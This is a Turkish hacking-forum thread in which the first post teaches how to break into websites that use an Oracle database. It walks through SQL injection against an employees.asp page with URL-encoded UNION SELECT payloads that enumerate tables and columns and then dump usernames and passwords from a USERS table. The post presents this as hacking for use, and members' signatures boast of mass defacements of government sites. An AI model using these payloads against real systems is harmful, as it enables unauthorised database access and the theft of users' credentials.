THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

HACK | Oracle SQL Injection Detaylı Bilgi

JohnDoe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2013
Nereden:
Teşkilat
Yaş:
34
Mesajlar:
2.717
Konular:
572
Teşekkür (Etti):
805
Teşekkür (Aldı):
929
Ticaret:
(0) %
20-09-2015 03:19
#1
HACK | Oracle SQL Injection Detaylı Bilgi
Merhabalar,

Bu makalemizde Oracle veritabanı kullanan bir siteyi nasıl hackleyebileceğimizi öğreneceğiz.

Makaleye geçmeden önce bazı ipuçları verelim:

Oracle’da boşluk karakteri önemlidir. Bu yüzden boşluk karakteri yerine %20 (URL encode ettik) kullandık.

Eşittir işaretinin yerine de %3d kullandık. Bunları yapmamızın asıl sebebi, karşımıza çıkabilecek bir hatayı önceden bypass etmektir.

Örnek sitemiz;

Yukarıdaki linke tıkladığımızda sitedeki kayıtlı çalışanlar listeleniyor.



Önce sql injection’ın ilk adımı olan kolon sayısını bulma işlemini yapıyoruz. Bu makalede daha önce kolon sayısını bulurken pek bilmediğimiz bir yöntemden bahsedeceğiz: Union Select yöntemi. Metodumuz şu şekilde işliyor: Aşağıdaki gibi bir komut yazıyoruz ve sayfanın hata vermemesini bekliyoruz. Eğer hata(resim2) verirse NULL sayısını 1 kez daha fazla yazıyoruz.

Komut;

Hata Resim;



Bir NULL daha yazıyoruz.

Komut;

Hata Resim;



Şimdi hangi kolonun string olduğunu bulmamız lazım. Yoksa veri çekemeyiz. Bunun için her defasında bir NULL yerine ’a’ karakterlerini yazıyoruz.

Komut;

Alıntı:
https://site.com/employees.asp?EmpNo...20SELECT%20’a’,
NULL,NULL,NULL%20from%20dual--
Aldığımız Hata;



2. NULL yerine ’a’ yazdığımızda aşağıdaki gibi bir ekran karşımıza çıktı:

Komut;

Alıntı:
https://site.com/employees.asp?EmpNo...0SELECT%20NULL,
’a’,NULL,NULL%20from%20dual--
Karşımıza Çıkan Ekran;



String kolonu bulduk.

Oracle’da user_objects adında, tüm nesnelerin adının ve türünün tutulduğu bir tablo var. Şimdi bu tablonun elemanlarını öğrenelim.

Komut;

Alıntı:
https://site.com/employees.asp?EmpNo...0SELECT%20NULL,
object_name,object_type,NULL%20from%20user_objects--


Gördüğünüz gibi indeksler, prosedürler, tablolar vs yansıdı. Burada işimize yarayacak tablo, USERS tablosu.

Oracle’da user_tab_columns adında, tüm sütunların adının tutulduğu da bir tablo vardır. Şimdi de bu tablodan USERS tablosunun sütunlarını öğrenelim.

Komut;

Alıntı:
https://site.com/employees.asp?EmpNo...0SELECT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20 where%20table_name%20%
3d%20’USERS’--


Gördüğünüz üzere USERS tablosunun 6 tane sütunu vardır. Bunlardan login ve password sütunlarında yer alan bilgileri çekelim.

Komut;

Alıntı:
https://site.com/employees.asp?EmpNo...0SELECT%20NULL,
login,password,NULL%20from%20users-


Evet, kullanıcı adı ve şifreleri öğrendik. Artık veritabanına giriş yapabiliriz.

Not: String türünde sadece bir kolon olsaydı, kullanıcı adı ve şifreleri şöyle çekebilirdik.

Alıntı:
https://site.com/employees.asp?EmpNo...0SELECT%20NULL,
login||’:’||password,NULL,NULL%20from%20user_objec ts--
Kolay gelsin.
--------------------- " TürkHackTeam "Vatan Operasyonu" 4093 Site Hacked [Şehitler Ölmez Vatan Bölünmez ! "
Türkiye'nin tek milli ve yerli #Hack grubu TürkHackTeam'dır. İçiniz rahat olsun biz buradayız.
BadRookie - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2014
Nereden:
System32
Mesajlar:
635
Konular:
58
Teşekkür (Etti):
235
Teşekkür (Aldı):
243
Ticaret:
(0) %
20-09-2015 03:22
#2
Eline emeğine emeğine sağlık hocam
---------------------
Madagaskar 15 Devlet Sitesi Hacked

Madem ben de bu vatanın bir evlâdıyım, bu vatanın saadetine hizmet etmek benim için farzdır.
(105)emirdağ lahikası
BEDİÜZZAMAN

iletişim: badrookie.tht@gmail.com
egeklan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
964
Konular:
89
Teşekkür (Etti):
431
Teşekkür (Aldı):
483
Ticaret:
(0) %
20-09-2015 03:22
#3
Ellerine sağlık harika
NamelessesMan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Mesajlar:
2.296
Konular:
122
Teşekkür (Etti):
679
Teşekkür (Aldı):
760
Ticaret:
(0) %
20-09-2015 03:22
#4
Eline sağlık yararlı konu abi
--------------------- Soracağız dediğimiz hesapları sorduk, şimdi acı acı gülüyoruz.
LosT - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Nereden:
-
Yaş:
20
Mesajlar:
6.732
Konular:
941
Teşekkür (Etti):
1753
Teşekkür (Aldı):
1871
Ticaret:
(0) %
20-09-2015 03:24
#5
Ellerine sağlık
cimbomenes1905 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2014
Nereden:
127.0.0.1
Mesajlar:
1.860
Konular:
78
Teşekkür (Etti):
271
Teşekkür (Aldı):
325
Ticaret:
(0) %
20-09-2015 09:22
#6
eline sağlık abi
klankil1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Nereden:
Trabzon
Mesajlar:
865
Konular:
143
Teşekkür (Etti):
536
Teşekkür (Aldı):
784
Ticaret:
(0) %
20-09-2015 09:42
#7
Eline sağlık abi
---------------------
𐰲𐰸:𐰖𐰴𐰦𐰀
'MTG - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Nereden:
System32
Mesajlar:
1.486
Konular:
170
Teşekkür (Etti):
299
Teşekkür (Aldı):
411
Ticaret:
(0) %
20-09-2015 10:34
#8
Saolun hocam elinize sağlık
---------------------
Şüphesiz O Gün Gelecek
Ve
Sen O Güne Tanıklık Edeceksin
CMassiveStrokeK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
Hamburg
Mesajlar:
772
Konular:
28
Teşekkür (Etti):
83
Teşekkür (Aldı):
179
Ticaret:
(0) %
20-09-2015 11:53
#9
Eline Sağlık Abi
---------------------
The Hacker CMassiveStrokeK
I'm Feture

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler